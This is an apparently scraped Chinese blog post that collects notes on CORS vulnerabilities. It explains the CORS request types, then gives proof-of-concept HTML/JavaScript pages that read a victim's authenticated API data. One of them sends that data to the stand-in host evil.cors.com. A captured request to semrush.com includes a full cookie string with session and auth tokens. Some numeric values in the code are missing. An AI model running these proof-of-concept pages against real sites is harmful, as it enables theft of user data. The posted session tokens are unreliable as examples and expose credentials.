CORS

简介

用途

解决同源下资源共享问题(其他类似方案:更改document.domain属性 | 跨文档消息 | JSONP)

分类

(1)Simple Request

User Request:
function retrieveData() {

  var request = new XMLHttpRequest();

  request.open('GET', 'http://public-data.com/someData', true);

  request.onreadystatechange = handler;

  request.send();

}

Browser Request:
GET /someData/ HTTP/1.1

Host: public-data.com

 ......

Referer: http://xxx.com/somePage.html

Origin: http://xxx.com
Response:
HTTP/1.1 200 OK

Access-Control-Allow-Origin: http://xxx.com

Content-Type: application/xml

(2)Preflighted Request 

User Request:
function sendData() {

    var request = new XMLHttpRequest(),

    payload = ......;

    request.open('POST', 'http://public-data.com/someData', true);

    request.setRequestHeader('X-CUSTOM-HEADER', 'custom_header_value');

    request.onreadystatechange = handler;

    request.send(payload);

 }
 
Browser Request-1:
OPTIONS /someData/ HTTP/1.1

Host: public-data.com

 ......

Origin: http://xxx.com

Access-Control-Request-Method: POST

Access-Control-Request-Headers: X-CUSTOM-HEADER

Response-1:
HTTP/1.1 200 OK

Access-Control-Allow-Origin: http://xxx.com

Access-Control-Allow-Methods: POST, GET, OPTIONS

Access-Control-Allow-Headers: X-CUSTOM_HEADER

Access-Control-Max-Age: 1728000

......


Request-2:


POST /someData/ HTTP/1.1

Host: public-data.com

X-CUSTOM-HEADER: custom_header_value

......




Browser Response-2:


HTTP/1.1 200 OK

Access-Control-Allow-Origin: http://xxx.com

Content-Type: application/xml

......


(3)Requests with Credential

User Request:


function retrieveData() {

     var request = new XMLHttpRequest();

     request.open('GET', 'http://public-data.com/someData', true);

     request.withCredentials = true;

     request.onreadystatechange = handler;

     request.send();

 }


Response:


HTTP/1.1 200 OK

Access-Control-Allow-Origin: http://xxx.com

Content-Type: application/xml






POC 




GET /organic-traffic-insights/api/rest/1.2/users/███/projects?_= HTTP/1.1

Host: www.semrush.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/ Firefox/53.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Referer: https://www.semrush.com/projects/

X-Requested-With: XMLHttpRequest

Cookie: wp13557="UWYYADs-TTTW:WWLHWYDtlnDl-TJIH-UYUTDDDIALHUZDLZTAHTIV-CCAY-XMLT-IUUA-UYUBWXWZACCWDlLtkNlo_Jht"; ref_code=__default__; usertype=Free-User; marketing=%7B%22user_cmp%22%3A%22%22%2C%22user_label%22%3A%22%22%7D; localization=%7B%22locale%22%3A%22en%22%2C%22db%22%3A%22sg%22%7D; db_date=current; userdata=%7B%22tz%22%3A%22GMT+8%22%2C%22ol%22%3A%22en%22%7D; _ga=GA1.2.412244322.1496213122; _gid=GA1.2.1937633003.1496213122; visit_first=1496213122000; __uvt=; uvts=65OAcWY4QhJHESTs; referer_purchase=https%3A%2F%2Fes.semrush.com%2Fdashboard%2F; sct:feedback:show=false; __insp_uid=2126149429; temp_db_but=sg; db=us; exp_feature_popup_closed=yes; about_sessionid=gue5yj2t8bmucnlwuv1y1cxilq7a7q8g; about_csrf=i6C8isOR7WLuVa1348FSsPH6rXzVEQSr; n_userid=LuWhoFku7Ou4q2PeBHIUAg==; __zlcmid=gngUE7HFajaRsy; _bizo_bzid=ec0d2554-575b-420b-b404-51b70939ec49; _bizo_cksm=34222E182676EC07; _bizo_np_stats=155%3D338%2C; auth_token=CMFMT27JhWR9cnbkoV1dHvFaxc4tQ3f0B4IAw5BfTOjyeKeF9FKx8w2kpiLl; __insp_wid=1632961932; __insp_slim=1496248714271; __insp_nv=false; __insp_targlpu=aHR0cHM6Ly93d3cuc2VtcnVzaC5jb20vcHJvamVjdHMvIzgwMDEyMi92aWV3Lw%3D%3D; __insp_targlpt=U0VNcnVzaA%3D%3D; __insp_norec_howoften=true; __insp_norec_sess=true; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en; connect.sid=s%253A4cV9yXJcfQFXmC65JJn3KSP6Wp184s10.vGOEA1%252BgVTXbwDY4YSOkOjjnteLNyifmcQdJh8XZckI; _gat=1; _uetsid=_uetd1ba382c; JSESSIONID=4423D9EF5D5BEE794094AC0713E9EE8E; _gat_UA-6197637-22=1

Connection: close

Origin: https://itqayzlbkshw.com

response it returns Access-Control-Allow-Origin: https://itqayzlbkshw.com




CORS + CSRF -》向被攻击主机发送文件


CORS + XSS -》劫持用户会话 | 注入攻击


蠕虫


JSONP 


(1)


XSS


1.POC | EXP




(2)越权


同源策略绕过方法


(1)绕过 - 仅对域名校验






#POC

#"Access-Control-Allow-Origin: https://xx.co & Access-Control-Allow-

    Credentials: true".

#Origin: https://xx.co.evil.net, Access-Control-Allow-Origin: https://xx.co.evil.net.

<html>

<body>

<button type='button' onclick='cors()'>CORS</button>

<p id='demo'></p>

<script>

function cors() {

var xhttp = new XMLHttpRequest();

xhttp.onreadystatechange = function() {

if (this.readyState ==  && this.status == ) {

var a = this.responseText;

document.getElementById("demo").innerHTML = a;

xhttp.open("POST", "http://evil.cors.com", true);

xhttp.withCredentials = true;

console.log(a);

xhttp.send("data="+a);

}

};

xhttp.open("GET", "https://www.xx.co/api/v1/users/*******", true);

xhttp.withCredentials = true;

xhttp.send();

}

</script>

</body>

</html>






(2)访问源未列入白名单,并且具备规则Access-Control-Allow-Credentials: true






<html>

     <body>

         <h2>CORS PoC</h2>

         <div id="demo">

             <button type="button" onclick="cors()">Exploit</button>

         </div>

         <script>

             function cors() {

             var xhr = new XMLHttpRequest();

             xhr.onreadystatechange = function() {

                 if (this.readyState ==  && this.status == ) {

                 document.getElementById("demo").innerHTML = alert(this.responseText);

                 }

             };

              xhr.open("GET",

                       "https://api.xx.com/endpoint", true);

             xhr.withCredentials = true;

             xhr.send();

             }

         </script>

     </body>

 </html>




												


											
跨域资源共享(CORS)-漏洞整理的更多相关文章
	

    
								
  1. 跨域资源共享(CORS)问题解决方案
		
    CORS:Cross-Origin Resource Sharing(跨域资源共享) CORS被浏览器支持的版本情况如下:Chrome 3+.IE 8+.Firefox 3.5+.Opera 12+. ...
    
		
    2. 
						
  2. 跨域资源共享CORS与JSONP
		
    同源策略限制: 同源策略(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,如果没有同源策略,攻击者可以通过JavaScript获取你的邮件以及其他敏感信息,比如说 ...
    
		
    3. 
						
  3. 跨域解决方案 - 跨域资源共享cors
		
    目录 1. cors 介绍 2. 原理 3. cors 解决跨域 4. 自定义HTTP 头部字段解决跨域 5. 代码演示 5. 参考链接 1. cors 介绍 cors 说的是一个机制,其实相当于一个 ...
    
		
    4. 
						
  4. VUE  SpringCloud 跨域资源共享 CORS 详解
		
    VUE  SpringCloud 跨域资源共享 CORS 详解 作者:  张艳涛 日期: 2020年7月28日 本篇文章主要参考:阮一峰的网络日志 » 首页 » 档案 --跨域资源共享 CORS 详解 ...
    
		
    5. 
						
  5. 网络编程-跨域资源共享 CORS
		
    目录 1.什么是同源策略? 2.跨域资源共享 CORS 3.预检请求 4.CORS相关字段 5.Golang实现跨域 6.参考资料 1.什么是同源策略? 如果两个 URL 的 protocol.por ...
    
		
    6. 
						
  6. 跨域资源共享 CORS
		
    CORS是一个W3C标准,全称是"跨域资源共享"(Cross-origin resource sharing). 它允许浏览器向跨源服务器,发出XMLHttpRequest请求,从 ...
    
		
    7. 
						
  7. 跨域资源共享 CORS 详解
		
    CORS是一个W3C标准,全称是"跨域资源共享"(Cross-origin resource sharing). 它允许浏览器向跨源服务器,发出XMLHttpRequest请求,从 ...
    
		
    8. 
						
  8. 使Web Api 支持跨域资源共享(CORS)
		
    Reference:http://www.asp.net/web-api/overview/security/enabling-cross-origin-requests-in-web-api Imp ...
    
		
    9. 
						
  9. 跨域资源共享CORS详解
		
    简介 CORS是一个W3C标准,全称是"跨域资源共享"(Cross-origin resource sharing). 它允许浏览器向跨源服务器,发出XMLHttpRequest请 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 从ES6重新认识JavaScript设计模式: 装饰器模式
			
    1 什么是装饰器模式 向一个现有的对象添加新的功能,同时又不改变其结构的设计模式被称为装饰器模式(Decorator Pattern),它是作为现有的类的一个包装(Wrapper). 可以将装饰器理解 ...
    
			
    2. 
						
  2. MySQL5.7 慢查询+DDL操作堵塞查询
			
    数据库版本: mysql> select @@version; +------------+ | @@version | +------------+ | 5.7.26-log | +----- ...
    
			
    3. 
						
  3. Linux环境下安装Django和Python
			
        1  下载前准备操作:安装相关的依赖库(工具包) yum install gcc patch libffi-devel python-devel  zlib-devel bzip2-devel ...
    
			
    4. 
						
  4. Spark 计算人员三度关系
			
    1.一度人脉:双方直接是好友 2.二度人脉:双方有一个以上共同的好友,这时朋友网可以计算出你们有几个共同的好友并且呈现数字给你.你们的关系是: 你->朋友->陌生人 3.三度人脉:即你朋友 ...
    
			
    5. 
						
  5. 2018-11-26-win10-UWP-Controls-by-function
			
    title author date CreateTime categories win10 UWP Controls by function lindexi 2018-11-26 20:0:6 +08 ...
    
			
    6. 
						
  6. 消灭 Java 代码的“坏味道”
			
    消灭 Java 代码的“坏味道” 原创: 王超 阿里巴巴中间件 昨天 导读 明代王阳明先生在<传习录>谈为学之道时说: 私欲日生,如地上尘,一日不扫,便又有一层.着实用功,便见道无终穷,愈 ...
    
			
    7. 
						
  7. JSP和Servlet及浏览器与tomcat交互过程
			
    JSP与SERVLET区别 JSP在本质上就是Servlet,但是两者的创建方式不一样. JSP由HTML代码和JSP标签构成,可以方便地编写动态网页.因此在实际应用中采用Servlet来控制业务流程 ...
    
			
    8. 
						
  8. Django登录(含随机生成图片验证码)注册实例
			
    登录,生成随机图片验证码 一.登录 - 随机生成图片验证码 1.随机生成验证码 Python随机生成图片验证码,需要使用PIL模块,安装方式如下: pip3 install pillow 1)创建图片 ...
    
			
    9. 
						
  9. Hybris Commerce下单时遇到产品库存不足的解决办法
			
    客户在Storefront下单试图购买一个产品时,遇到out of stock库存不足的错误,无法下单: 解决办法:登录Backoffice,Stock level菜单: 创建一个新的stock le ...
    
			
    10. 
						
  10. [洛谷P1095]NOIP2007 普及组T3 守望者的逃离
			
    问题描述 恶魔猎手尤迪安野心勃勃,他背叛了暗夜精灵,率领深藏在海底的娜迦族企图叛变.守望者在与尤迪安的交锋中遭遇了围杀,被困在一个荒芜的大岛上.为了杀死守望者,尤迪安开始对这个荒岛施咒,这座岛很快就会 ...
    
			
    11.